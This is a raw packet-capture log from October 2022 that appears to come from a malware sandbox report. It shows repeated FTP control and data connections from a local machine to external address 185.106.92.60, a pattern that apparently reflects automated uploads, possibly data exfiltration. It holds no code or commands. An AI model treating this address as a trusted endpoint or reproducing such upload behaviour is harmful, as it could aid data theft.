                                                                                                                                    Oct 10, 2022 06:03:41.012355089 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.012435913 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.012778044 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.035432100 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.035504103 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.035883904 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.082621098 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.082703114 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.082854033 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.105869055 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.105993032 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.106782913 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.129524946 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.129601955 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.130666971 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.153736115 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.153862000 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.158354044 CEST5002864706192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.181056976 CEST6470650028185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.181175947 CEST5002864706192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.181493044 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.204688072 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.204771996 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.205363989 CEST5002864706192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.227776051 CEST6470650028185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.227886915 CEST6470650028185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.227983952 CEST5002864706192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.228382111 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.228545904 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.228696108 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.250988960 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.251028061 CEST2150027185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.251127005 CEST5002721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.375530005 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.401127100 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.401376009 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.430238962 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.430444956 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.430741072 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.430843115 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.430857897 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.430984020 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.431171894 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.457029104 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.457151890 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.457320929 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.482582092 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.482717037 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.483274937 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.508594036 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.508729935 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.516199112 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.542041063 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.542196035 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.542598009 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.566560984 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.566751003 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.568439960 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.593552113 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.593851089 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.594794035 CEST5003064707192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.617799997 CEST6470750030185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.617968082 CEST5003064707192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.622371912 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.647212029 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.647439003 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.648471117 CEST5003064707192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.671480894 CEST6470750030185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.671530962 CEST6470750030185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.671740055 CEST5003064707192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.671951056 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.672040939 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.673224926 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.697803974 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.697849035 CEST2150029185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.697984934 CEST5002921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.889210939 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.912096024 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.912240982 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.938854933 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.939215899 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.939306021 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.939356089 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.939387083 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.940814972 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.964440107 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.964807034 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.964929104 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.987793922 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:41.988006115 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:41.988303900 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.011328936 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.012890100 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.013262987 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.037729979 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.042215109 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.042804003 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.065877914 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.066162109 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.067172050 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.090276003 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.090600014 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.091034889 CEST5003264709192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.114777088 CEST6470950032185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.118016958 CEST5003264709192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.118808985 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.141933918 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.142151117 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.142626047 CEST5003264709192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.166197062 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.166306019 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.166440964 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.166500092 CEST6470950032185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.166924953 CEST6470950032185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.167001963 CEST5003264709192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.188710928 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.189691067 CEST2150031185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.189774990 CEST5003121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.310497046 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.333796978 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.333941936 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.360235929 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.360291004 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.360492945 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.360790968 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.366277933 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.366342068 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.389632940 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.389772892 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.389942884 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.413238049 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.413481951 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.413897991 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.437071085 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.438309908 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.441054106 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.465167999 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.468276024 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.469255924 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.492325068 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.493065119 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.496925116 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.520174026 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.520318031 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.520625114 CEST5003464710192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.543411016 CEST6471050034185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.545355082 CEST5003464710192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.545715094 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.585825920 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.586256027 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.586632013 CEST5003464710192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.609508991 CEST6471050034185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.609544992 CEST6471050034185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.609613895 CEST5003464710192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.610086918 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.610373974 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.610373974 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.633232117 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.633310080 CEST2150033185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.633665085 CEST5003321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.741672039 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.766738892 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.766933918 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.795295000 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.795350075 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.795382977 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.795608997 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.795777082 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.857544899 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.857835054 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.858196020 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.882695913 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.882985115 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.883244038 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.908833027 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.909147024 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.909254074 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.936356068 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.936755896 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.937609911 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.964509964 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.964756966 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.965740919 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.991337061 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:42.991568089 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:42.992224932 CEST5003664711192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.015398979 CEST6471150036185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.015681028 CEST5003664711192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.016058922 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.042406082 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.042682886 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.043114901 CEST5003664711192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.065778017 CEST6471150036185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.065958977 CEST6471150036185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.066050053 CEST5003664711192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.066438913 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.066546917 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.066814899 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.091026068 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.091080904 CEST2150035185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.091293097 CEST5003521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.198699951 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.222533941 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.222815990 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.250843048 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.250945091 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.250962019 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.251162052 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.255258083 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.279036999 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.279344082 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.279680014 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.303489923 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.303652048 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.304137945 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.327739000 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.328110933 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.329821110 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.353879929 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.354110003 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.354967117 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.379487038 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.379729033 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.384838104 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.408973932 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.409197092 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.409719944 CEST5003864712192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.432769060 CEST6471250038185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.432996988 CEST5003864712192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.433630943 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.458168030 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.458412886 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.459328890 CEST5003864712192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.482319117 CEST6471250038185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.482388973 CEST6471250038185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.482413054 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.482618093 CEST5003864712192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.482777119 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.482934952 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.506613970 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.508136988 CEST2150037185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.508289099 CEST5003721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.619663000 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.642906904 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.643126011 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.669976950 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.670006037 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.670020103 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.670072079 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.670109034 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.673616886 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.697352886 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.697571993 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.702301979 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.725567102 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.725658894 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.725857973 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.749025106 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.749198914 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.749368906 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.772742987 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.772984028 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.774812937 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.797970057 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.798156977 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.800474882 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.824243069 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.824337959 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.824706078 CEST5004064713192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.847455978 CEST6471350040185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.847588062 CEST5004064713192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.847887993 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.872170925 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.872313976 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.872854948 CEST5004064713192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.895698071 CEST6471350040185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.895879984 CEST6471350040185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.895972967 CEST5004064713192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.896610975 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.896739006 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.897952080 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:43.921091080 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.921163082 CEST2150039185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:43.921272039 CEST5003921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.098505974 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.124861002 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.124995947 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.154128075 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.154159069 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.154177904 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.154301882 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.154301882 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.154489040 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.180665016 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.180773020 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.180891037 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.208328962 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.208466053 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.211849928 CEST5004121192.168.2.3185.106.92.60
